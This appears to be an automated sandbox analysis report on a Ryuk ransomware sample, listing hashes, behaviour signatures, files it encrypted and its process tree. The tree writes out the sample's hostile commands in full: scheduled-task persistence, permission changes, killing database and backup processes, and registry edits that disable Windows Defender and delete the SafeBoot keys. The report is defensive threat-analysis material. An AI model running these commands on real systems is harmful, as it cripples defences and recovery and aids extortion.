Analysis
-
max time kernel
112s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2022 20:33
Static task
static1
Behavioral task
behavioral1
Sample
ryuk.exe
Resource
win10v2004-20220812-en
Errors
General
-
Target
ryuk.exe
-
Size
885KB
-
MD5
35194c73ff38dd6c3bed7c0efcff6826
-
SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
-
SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
-
SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
-
SSDEEP
12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Recoverfile@aol.com
Recoverfile1@aol.com
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ryuk.exedescription ioc process File opened (read-only) \??\W: ryuk.exe File opened (read-only) \??\M: ryuk.exe File opened (read-only) \??\N: ryuk.exe File opened (read-only) \??\Q: ryuk.exe File opened (read-only) \??\R: ryuk.exe File opened (read-only) \??\O: ryuk.exe File opened (read-only) \??\S: ryuk.exe File opened (read-only) \??\U: ryuk.exe File opened (read-only) \??\V: ryuk.exe File opened (read-only) \??\E: ryuk.exe File opened (read-only) \??\F: ryuk.exe File opened (read-only) \??\K: ryuk.exe File opened (read-only) \??\A: ryuk.exe File opened (read-only) \??\T: ryuk.exe File opened (read-only) \??\X: ryuk.exe File opened (read-only) \??\Y: ryuk.exe File opened (read-only) \??\Z: ryuk.exe File opened (read-only) \??\H: ryuk.exe File opened (read-only) \??\L: ryuk.exe File opened (read-only) \??\B: ryuk.exe File opened (read-only) \??\P: ryuk.exe File opened (read-only) \??\G: ryuk.exe File opened (read-only) \??\I: ryuk.exe File opened (read-only) \??\J: ryuk.exe -
Drops file in Program Files directory 64 IoCs
Processes:
ryuk.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryLetter.dotx.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRLEX.DLL.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLL.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN105.XML.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\km.pak.DATA.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPG.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\DocumentRepository.ico.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mr.pak.DATA.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.White@2x.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONDIRECTX.DLL.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ga.pak.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7EN.dub.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.[Recoverfile@aol.com].RYK ryuk.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4192 schtasks.exe 4528 schtasks.exe 3568 schtasks.exe 3600 schtasks.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3884 taskkill.exe 968 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ryuk.exepid process 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe 4824 ryuk.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3884 taskkill.exe Token: SeDebugPrivilege 968 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ryuk.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4824 wrote to memory of 3064 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 3064 4824 ryuk.exe cmd.exe PID 3064 wrote to memory of 3600 3064 cmd.exe schtasks.exe PID 3064 wrote to memory of 3600 3064 cmd.exe schtasks.exe PID 4824 wrote to memory of 5032 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 5032 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 1732 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 1732 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 4112 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 4112 4824 ryuk.exe cmd.exe PID 4112 wrote to memory of 4192 4112 cmd.exe schtasks.exe PID 4112 wrote to memory of 4192 4112 cmd.exe schtasks.exe PID 4824 wrote to memory of 1672 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 1672 4824 ryuk.exe cmd.exe PID 1672 wrote to memory of 1128 1672 cmd.exe attrib.exe PID 1672 wrote to memory of 1128 1672 cmd.exe attrib.exe PID 4824 wrote to memory of 3596 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 3596 4824 ryuk.exe cmd.exe PID 3596 wrote to memory of 4528 3596 cmd.exe schtasks.exe PID 3596 wrote to memory of 4528 3596 cmd.exe schtasks.exe PID 4824 wrote to memory of 628 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 628 4824 ryuk.exe cmd.exe PID 628 wrote to memory of 3568 628 cmd.exe schtasks.exe PID 628 wrote to memory of 3568 628 cmd.exe schtasks.exe PID 4824 wrote to memory of 1148 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 1148 4824 ryuk.exe cmd.exe PID 1148 wrote to memory of 2372 1148 cmd.exe attrib.exe PID 1148 wrote to memory of 2372 1148 cmd.exe attrib.exe PID 4824 wrote to memory of 2768 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 2768 4824 ryuk.exe cmd.exe PID 2768 wrote to memory of 2324 2768 cmd.exe attrib.exe PID 2768 wrote to memory of 2324 2768 cmd.exe attrib.exe PID 4824 wrote to memory of 2764 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 2764 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 4532 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 4532 4824 ryuk.exe cmd.exe PID 2764 wrote to memory of 4352 2764 cmd.exe cmd.exe PID 2764 wrote to memory of 4352 2764 cmd.exe cmd.exe PID 4532 wrote to memory of 1472 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1472 4532 cmd.exe reg.exe PID 4824 wrote to memory of 228 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 228 4824 ryuk.exe cmd.exe PID 228 wrote to memory of 1556 228 cmd.exe cmd.exe PID 228 wrote to memory of 1556 228 cmd.exe cmd.exe PID 228 wrote to memory of 3884 228 cmd.exe taskkill.exe PID 228 wrote to memory of 3884 228 cmd.exe taskkill.exe PID 4824 wrote to memory of 3080 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 3080 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 1124 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 1124 4824 ryuk.exe cmd.exe PID 4352 wrote to memory of 388 4352 cmd.exe icacls.exe PID 4352 wrote to memory of 388 4352 cmd.exe icacls.exe PID 4824 wrote to memory of 5112 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 5112 4824 ryuk.exe cmd.exe PID 1556 wrote to memory of 968 1556 cmd.exe taskkill.exe PID 1556 wrote to memory of 968 1556 cmd.exe taskkill.exe PID 4824 wrote to memory of 4804 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 4804 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 5060 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 5060 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 2896 4824 ryuk.exe cmd.exe PID 4824 wrote to memory of 2896 4824 ryuk.exe cmd.exe PID 2896 wrote to memory of 4564 2896 cmd.exe reg.exe PID 2896 wrote to memory of 4564 2896 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 2372 attrib.exe 2324 attrib.exe 1128 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ryuk.exe"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\RYUKIDFilesize
8B
MD520bf1c3daf0bf3cfb0db6661538a9afc
SHA15db0319ce78dcae075cc393c374b0856cdc2e02a
SHA256fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
SHA512bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e
-
C:\ProgramData\RyukReadMe.txtFilesize
1KB
MD53cfd6ef3b2825aa6ce421e10604ff452
SHA17c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA25665adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc
-
C:\ProgramData\hrmlog1Filesize
2KB
MD54b6fbbf03e95f33ba5c363bb67de4b9b
SHA1e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA2563f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b
-
C:\ProgramData\hrmlog1Filesize
2KB
MD54b6fbbf03e95f33ba5c363bb67de4b9b
SHA1e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA2563f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
